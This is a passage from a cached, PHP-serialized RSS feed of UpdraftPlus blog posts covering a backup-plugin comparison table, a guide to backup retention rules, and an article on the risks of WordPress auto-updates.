style=\"text-align:left;\"><h4>Automatic backups before updating site</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Ability to backup encrypted databases</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Network/Multisite supported</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>SFTP and FTP backups</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Backup directly to proprietory cloud service</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Backup to Dropbox</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Backup to Googledrive</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Backup to OneDrive</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Backup to S3</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Backup to Microsoft Azure</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Backup to Google Cloud</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Backup to BackBlaze</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Run From WP-CL</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr><tr><td style=\"text-align:left;\"><h4>Restore a backup from other plugins</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td></tr>\n</tbody>\n</table></div>\n			</div> <!-- .et_pb_code -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section -->\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/udpvsbup-wordpress-backup-comparison/\">UpdraftPlus Vs BackupBuddy: WordPress backup plugins compared</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://updraftplus.com/udpvsbup-wordpress-backup-comparison/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"How to set up additional retention rules for your UpdraftPlus backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/3NFhjGJbaYA/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Jul 2021 15:24:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:15:\"additional rule\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"Backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:9:\"retention\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:14:\"retention rule\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1172077\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:753:\"<p>In this blog, we will show you how to add additional retention rules when backing up your WordPress sites with UpdraftPlus.  By adding additional retention rules, all backups that are older than a certain date will be grouped together and &#8230; <a href=\"https://updraftplus.com/additional-updraftplus-retention-rules/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/additional-updraftplus-retention-rules/\">How to set up additional retention rules for your UpdraftPlus backup</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4824:\"<p><span style=\"font-weight: 400;\">In this blog, we will show you how to add additional retention rules when backing up your WordPress sites with UpdraftPlus. </span></p>\n<p><iframe loading=\"lazy\" title=\"How to set up additional retention rules for your UpdraftPlus backup\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/Z5vaHBCfCvw?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">By adding additional retention rules, all backups that are older than a certain date will be grouped together and pruned until there is only one backup for each time period. The additional retention rules run after the normal backup pruning, and are run in the order they were created. Additional retention rules also include automatic </span><span style=\"font-weight: 400;\">backups when evaluating which backups to prune.</span></p>\n<p><span style=\"font-weight: 400;\">First, you will need to<a href=\"https://updraftplus.com/upgrade-from-free-to-updraftplus-premium/\"> install and activate</a> UpdraftPlus Premium or the &#8216;<a href=\"https://updraftplus.com/shop/fix-time/\">Backup time and scheduling</a>&#8216; add-on, via the Premium/Extensions tab. Full instructions on how to do so can be found in our<a href=\"https://updraftplus.com/support/installing-updraftplus-premium-your-add-on/\"> installation guide</a>.</span></p>\n<p><span style=\"font-weight: 400;\">To set it up, first go to: WP Admin-&gt;Settings-&gt;UpdraftPlus Backups-&gt;Settings tab</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141921.901.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1172080\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141921.901.jpg\" alt=\"\" width=\"992\" height=\"677\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141921.901.jpg 992w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141921.901-980x669.jpg 980w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141921.901-480x328.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 992px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">Under the Files/Database backup schedule settings, find the &#8216;Add an additional retention rule&#8217; link</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141813.780.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1172081\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141813.780.jpg\" alt=\"\" width=\"992\" height=\"677\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141813.780.jpg 992w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141813.780-980x669.jpg 980w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T141813.780-480x328.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 992px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">Set your additional retention rule/s and press the &#8216;Save Changes&#8217; button at the bottom of the page.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T142042.766.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1172079\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T142042.766.jpg\" alt=\"\" width=\"992\" height=\"677\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T142042.766.jpg 992w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T142042.766-980x669.jpg 980w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-09T142042.766-480x328.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 992px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">Set how old the backups to be considered should be and how many backups to keep. Once this is setup, all backups older than your selected time period will be grouped together and pruned, until there is only one backup for each time period.</span></p>\n<p>&nbsp;</p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/additional-updraftplus-retention-rules/\">How to set up additional retention rules for your UpdraftPlus backup</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://updraftplus.com/additional-updraftplus-retention-rules/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:75:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"The risks and pitfalls of WordPress auto-updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/mzuE7ur8Svk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 25 Jun 2021 14:17:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:7:{i:0;a:5:{s:4:\"data\";s:20:\"Easy Updates Manager\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:28:\"easy updates manager premium\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:6:\"update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:18:\"updraftplus update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1161126\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:774:\"<p>When a new version of WordPress launched in August of 2020, something else came with it: a brand-spanking-new updates feature, along with the risks and pitfalls of WordPress auto-updates. This marked a step-up from previous WordPress releases, in which plugins &#8230; <a href=\"https://updraftplus.com/the-risks-and-pitfalls-of-wordpress-auto-updates/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/the-risks-and-pitfalls-of-wordpress-auto-updates/\">The risks and pitfalls of WordPress auto-updates</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Marjorie Hajim\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11339:\"<p><span style=\"font-weight: 400;\">When a new version of WordPress launched in August of 2020, something else came with it: a brand-spanking-new updates feature, along with the risks and pitfalls of WordPress auto-updates. </span><span style=\"font-weight: 400;\">This marked a step-up from previous WordPress releases, in which plugins and themes could only be manually updated. When version 5.5 was released, WordPress users were able to enable auto-updates for any plugin or theme on their site. </span></p>\n<p><span style=\"font-weight: 400;\">Sounds great, right? In many ways it was. But here’s the catch. Auto-updates aren’t always the best thing since sliced bread and are in fact known to cause a whole load of problems ranging from mildly inconvenient formatting issues, to the downright catastrophic total site failures. </span><span style=\"font-weight: 400;\">If you’ve been thinking about enabling auto-updates for your website, you’ve come to the right place. In this blog, we’ll be running you through some common risks and pitfalls and how to avoid them.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1161134\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled.png\" alt=\"\" width=\"1006\" height=\"629\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-980x613.png 980w, https://updraftplus.com/wp-content/uploads/2021/06/Untitled-480x300.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1006px, 100vw\" /></a></p>\n<h2><span style=\"font-weight: 400;\">What is an auto-update?</span></h2>\n<p><span style=\"font-weight: 400;\">Auto-updates are updates to plugins and themes that take place automatically without the site owner having to do anything manually via WordPress. Unlike manual updates, there’s no need to initiate the process or download new versions of your existing plugins and themes. In WordPress 5.5, site owners can choose whether or not to use the auto-update feature. For example, if your WordPress site is integrated with one of the many <a href=\"https://www.ringcentral.co.uk/gb/en/blog/definitions/cloud-management-platform/\">cloud management platforms</a> available, it will be automatically updated without you having to lift a finger. Each plugin and theme has its own ON/OFF option specifically for auto-updates.</span></p>\n<p>&nbsp;</p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-1.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1161135\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-1.png\" alt=\"\" width=\"990\" height=\"661\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-1.png 990w, https://updraftplus.com/wp-content/uploads/2021/06/Untitled-1-980x654.png 980w, https://updraftplus.com/wp-content/uploads/2021/06/Untitled-1-480x320.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 990px, 100vw\" /></a></p>\n<h2><span style=\"font-weight: 400;\">What are the risks?</span></h2>\n<p><span style=\"font-weight: 400;\">Whatever kind of business you&#8217;re running &#8211; be it a small eCommerce store or a </span><a href=\"https://accelerateagency.ai/saas-marketing-agency\"><span style=\"font-weight: 400;\">SaaS digital marketing</span></a><span style=\"font-weight: 400;\"> agency, before enabling auto-updates on your WordPress site, it’s important to be aware of all the ‘side-effects’ &#8211; both good and bad. Auto-updates are convenient, but there can be some big drawbacks. </span></p>\n<h2><span style=\"font-weight: 400;\">Updates can cause technical issues</span></h2>\n<p><span style=\"font-weight: 400;\">Updates have been known to sometimes cause problems on your website. This is more likely if you opt for comprehensive auto-updates across all plugins and themes. Updates will run in the background and you won’t even be aware of it most of the time. But sometimes updates cause technical issues or even ‘breaks’. Auto-updates can fail, especially when concurrent updates are happening simultaneously &#8211; with site functionality (e.g. </span><a href=\"https://vwo.com/blog/mobile-optimization-importance/\"><span style=\"font-weight: 400;\">mobile optimization</span></a><span style=\"font-weight: 400;\">) more likely to go askew. </span></p>\n<h2><span style=\"font-weight: 400;\">Updates can be hard to keep track of</span></h2>\n<p><span style=\"font-weight: 400;\">If an update does mess up your site, you will need to know what caused it. Determining exactly what happened and when can be tricky. Especially if multiple updates all took place simultaneously. With selected automatic and manual updates, it can be easier to isolate the root issue and fix it. </span></p>\n<h2><span style=\"font-weight: 400;\">Some major releases may be incompatible</span></h2>\n<p><span style=\"font-weight: 400;\">Sometimes auto-updates might include a major release. If a particular plugin (e.g. a plugin used to </span><a href=\"https://www.codemotion.com/magazine/dev-hub/cloud-manager/how-to-monitor-cloud-metrics-for-scaling/\"><span style=\"font-weight: 400;\">monitor cloud metrics</span></a><span style=\"font-weight: 400;\">) releases an update with a larger than normal installation base, it could cause problems. If you have auto-update enabled, you won’t have any control over whether or not you wish to deploy those changes. </span></p>\n<p><span style=\"font-weight: 400;\">WordPress does not use a ‘Canary update’ testing process. Canary updates roll out code to test sites before official release. Without this, there’s no telling what a new update will do. Likewise with smaller plugins, top-notch quality assurance is not guaranteed. By enabling auto-updates you’re essentially handing over control to unknown quality assurance teams. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-2.png\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1161136\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-2.png\" alt=\"\" width=\"800\" height=\"360\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/06/Untitled-2.png 800w, https://updraftplus.com/wp-content/uploads/2021/06/Untitled-2-480x216.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw\" /></a></p>\n<h2><span style=\"font-weight: 400;\">The best way to run WordPress updates</span></h2>\n<p><span style=\"font-weight: 400;\">There are safer ways to enjoy the benefits that automatic updates bring. Just proceed with caution. Now that you’re aware of some of those common issues, you can enjoy auto-updates without worrying too much about the consequences. </span></p>\n<p><span style=\"font-weight: 400;\">With all the potential issues your site can be faced when updating your plugins and theme, it is vitally important to have a secure and recent backup of your site. There are tons of <a href=\"https://www.ringcentral.co.uk/gb/en/blog/definitions/anything-as-a-service-xaas/\">XaaS</a> tools available today and having a backup with </span><a href=\"http://updraftplus.com\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\"> can help save you. Even if you take all the necessary precautions, it is still possible to fall victim to a bad update and have your site die on you. </span><span style=\"font-weight: 400;\">Backing up your site with UpdraftPlus can be done in just a few minutes. Just download UpdraftPlus, follow these </span><a href=\"https://updraftplus.com/how-to-backup-a-wordpress-site-step-by-step-guide/\"><span style=\"font-weight: 400;\">simple instructions</span></a><span style=\"font-weight: 400;\"> and you won’t have to worry about an update permanently taking down your site again. There are still risks however &#8211; e</span>ven if you take all the precautions necessary, a bad update can sometimes stop you from even logging into your site. In this scenario, restoring it to it&#8217;s former working version will be a complicated and difficult process. UpdraftPlus allows you to test your updates on a clone of your site using <a href=\"https://updraftplus.com/updraftclone/\">UpdraftClone</a>. UpdraftClone allows you to clone your site instantly and directly from UpdraftPlus, which can further reduce any danger to your main site by allowing you to test updates in a secure and risk-free environment.</p>\n<p><span style=\"font-weight: 400;\">UpdraftPlus Premium also has an auto-backup feature that creates a backup for you, before any updates to plugins and themes are performed. While the latest update of WordPress can update your plugins automatically, we recommend that you turn off auto-updates for all/selected plugins and use </span><a href=\"https://easyupdatesmanager.com/\"><span style=\"font-weight: 400;\">Easy Updates Manager</span></a><span style=\"font-weight: 400;\"> instead. Easy Updates Manager currently helps more than 300,000 WordPress users automatically keep their sites up to date and bug-free. It’s also highly customizable to give you real control over what updates to run.</span></p>\n<div id=\"attachment_1161137\" style=\"width: 977px\" class=\"wp-caption alignnone\"><a href=\"https://updraftplus.com/wp-content/uploads/2021/06/New-Project-2021-06-25T135451.001.jpg\"><img aria-describedby=\"caption-attachment-1161137\" loading=\"lazy\" class=\"wp-image-1161137\" src=\"https://updraftplus.com/wp-content/uploads/2021/06/New-Project-2021-06-25T135451.001.jpg\" alt=\"\" width=\"967\" height=\"624\" /></a><p id=\"caption-attachment-1161137\" class=\"wp-caption-text\">Easy Updates Manager in action</p></div>\n<p><span style=\"font-weight: 400;\">Choose from manually update, disable update, enable auto updates, disable auto updates and choose per plugin/theme, so you always have full control over your site and what aspects are updated. </span><span style=\"font-weight: 400;\">This offers a greater degree of control and limits unnecessary risk or disruption &#8211; disruption that could potentially derail a business in its infancy. </span></p>\n<p><span style=\"font-weight: 400;\">The potential business impact of an auto-update-related disruption could be catastrophic. If an automatic update interferes with your customer payment portal for example, the losses could be substantial for a well-established brand with high volume sales. </span></p>\n<p><span style=\"font-weight: 400;\">Use </span><a href=\"http://updaftplus.com\"><span style=\"font-weight: 400;\">UpdraftPlus </span></a><span style=\"font-weight: 400;\">and </span><a href=\"https://easyupdatesmanager.com/\"><span style=\"font-weight: 400;\">Easy Updates Manager</span></a><span style=\"font-weight: 400;\"> today for the best backup and auto update options. </span></p>\n<p><a href=\"https://www.ringcentral.co.uk/office/features/multi-level-auto-attendant/overview.html\"><b>Marjorie Hajim</b></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/the-risks-and-pitfalls-of-wordpress-auto-updates/\">The risks and pitfalls of WordPress auto-updates</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://updraftplus.com/the-risks-and-pitfalls-of-wordpress-auto-updates/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:90:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"7 critical measures for protecting your WordPress admin area\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/QYNvBAmmBSw/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 04 Jun 2021 14:10:18 